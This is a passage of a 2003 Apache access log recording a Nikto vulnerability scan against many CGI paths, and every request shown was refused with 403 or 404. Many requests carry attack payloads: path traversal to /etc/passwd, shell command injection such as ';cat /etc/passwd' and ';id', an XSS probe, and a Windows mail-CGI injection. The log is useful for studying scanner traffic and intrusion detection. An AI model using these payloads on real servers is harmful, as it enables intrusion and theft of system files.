+0900] "GET /cgi.cgi/viewlogs.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:40 +0900] "GET /cgi-bin/viewlogs.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:40 +0900] "GET /cgi.cgi/viewsource?/etc/passwd HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:41 +0900] "GET /cgi-bin/viewsource?/etc/passwd HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:42 +0900] "GET /cgi.cgi/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:42 +0900] "GET /cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:43 +0900] "GET /cgi.cgi/viralator.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:44 +0900] "GET /cgi-bin/viralator.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:45 +0900] "GET /cgi.cgi/virgil.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:45 +0900] "GET /cgi-bin/virgil.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:46 +0900] "GET /cgi.cgi/visadmin.exe HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:47 +0900] "GET /cgi-bin/visadmin.exe HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:47 +0900] "GET /cgi.cgi/visitor.exe HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:48 +0900] "GET /cgi-bin/visitor.exe HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:49 +0900] "GET /cgi.cgi/vote.cgi HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:50 +0900] "GET /cgi-bin/vote.cgi HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:50 +0900] "GET /cgi.cgi/vpasswd.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:51 +0900] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:52 +0900] "GET /cgi.cgi/vq/demos/respond.pl?<script>alert('Vulnerable')</script> HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:53 +0900] "GET /cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:53 +0900] "GET /cgi.cgi/VsSetCookie.exe? HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:54 +0900] "GET /cgi-bin/VsSetCookie.exe? HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:55 +0900] "GET /cgi.cgi/w3-msql HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:55 +0900] "GET /cgi-bin/w3-msql HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:56 +0900] "GET /cgi.cgi/w3-sql HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:57 +0900] "GET /cgi-bin/w3-sql HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:58 +0900] "GET /cgi.cgi/way-board.cgi?db=/etc/passwd%00 HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:58 +0900] "GET /cgi-bin/way-board.cgi?db=/etc/passwd%00 HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:58:59 +0900] "GET /cgi.cgi/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.0" 403 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:00 +0900] "GET /cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:00 +0900] "GET /cgi.cgi/wconsole.dll HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:01 +0900] "GET /cgi-bin/wconsole.dll HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:02 +0900] "GET /cgi.cgi/webais HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:03 +0900] "GET /cgi-bin/webais HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:03 +0900] "GET /cgi.cgi/webbbs.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:04 +0900] "GET /cgi-bin/webbbs.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:05 +0900] "GET /cgi.cgi/webbbs.exe HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:05 +0900] "GET /cgi-bin/webbbs.exe HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:06 +0900] "GET /cgi.cgi/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd HTTP/1.0" 403 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:07 +0900] "GET /cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:08 +0900] "GET /cgi.cgi/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD HTTP/1.0" 403 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:08 +0900] "GET /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:09 +0900] "GET /cgi.cgi/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:10 +0900] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:10 +0900] "GET /cgi.cgi/webdriver HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:11 +0900] "GET /cgi-bin/webdriver HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:12 +0900] "GET /cgi.cgi/webgais HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:13 +0900] "GET /cgi-bin/webgais HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:13 +0900] "GET /cgi.cgi/webif.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:14 +0900] "GET /cgi-bin/webif.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:15 +0900] "GET /cgi.cgi/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:16 +0900] "GET /cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:16 +0900] "GET /cgi.cgi/webmap.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:17 +0900] "GET /cgi-bin/webmap.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:18 +0900] "GET /cgi.cgi/Webnews.exe HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:18 +0900] "GET /cgi-bin/Webnews.exe HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:19 +0900] "GET /cgi.cgi/webnews.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:20 +0900] "GET /cgi-bin/webnews.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:21 +0900] "GET /cgi.cgi/webplus.exe?about HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:21 +0900] "GET /cgi-bin/webplus.exe?about HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:22 +0900] "GET /cgi.cgi/webplus?about HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:23 +0900] "GET /cgi-bin/webplus?about HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:23 +0900] "GET /cgi.cgi/webplus?script=../../../../../../../../../../etc/passwd HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:24 +0900] "GET /cgi-bin/webplus?script=../../../../../../../../../../etc/passwd HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:25 +0900] "GET /cgi.cgi/websendmail HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:26 +0900] "GET /cgi-bin/websendmail HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:26 +0900] "GET /cgi.cgi/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:27 +0900] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:28 +0900] "GET /cgi.cgi/webutil.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:28 +0900] "GET /cgi-bin/webutil.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:29 +0900] "GET /cgi.cgi/webutils.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:30 +0900] "GET /cgi-bin/webutils.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:31 +0900] "GET /cgi.cgi/webwho.pl HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:31 +0900] "GET /cgi-bin/webwho.pl HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:32 +0900] "GET /cgi.cgi/wguest.exe HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:33 +0900] "GET /cgi-bin/wguest.exe HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:33 +0900] "GET /cgi.cgi/whois.cgi?action=load&whois=%3Bid HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:34 +0900] "GET /cgi-bin/whois.cgi?action=load&whois=%3Bid HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:35 +0900] "GET /cgi.cgi/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:36 +0900] "GET /cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:36 +0900] "GET /cgi.cgi/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:37 +0900] "GET /cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:38 +0900] "GET /cgi.cgi/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:38 +0900] "GET /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:39 +0900] "GET /cgi.cgi/windmail HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:40 +0900] "GET /cgi-bin/windmail HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:41 +0900] "GET /cgi.cgi/windmail.exe HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:41 +0900] "GET /cgi-bin/windmail.exe HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:42 +0900] "GET /cgi.cgi/WINDMAIL.EXE?%20-n%20c:\\boot.ini% HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:43 +0900] "GET /cgi-bin/WINDMAIL.EXE?%20-n%20c:\\boot.ini% HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:43 +0900] "GET /cgi.cgi/WINDMAIL.EXE?%20-n%20c:\\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\\", HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:44 +0900] "GET /cgi-bin/WINDMAIL.EXE?%20-n%20c:\\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\\", HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:45 +0900] "GET /cgi.cgi/wrap HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:46 +0900] "GET /cgi-bin/wrap HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:46 +0900] "GET /cgi.cgi/wrap.cgi HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:47 +0900] "GET /cgi-bin/wrap.cgi HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:48 +0900] "GET /cgi.cgi/WS_FTP.ini HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:59:48 +0900] "GET /cgi-bin/WS_FTP.ini HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )"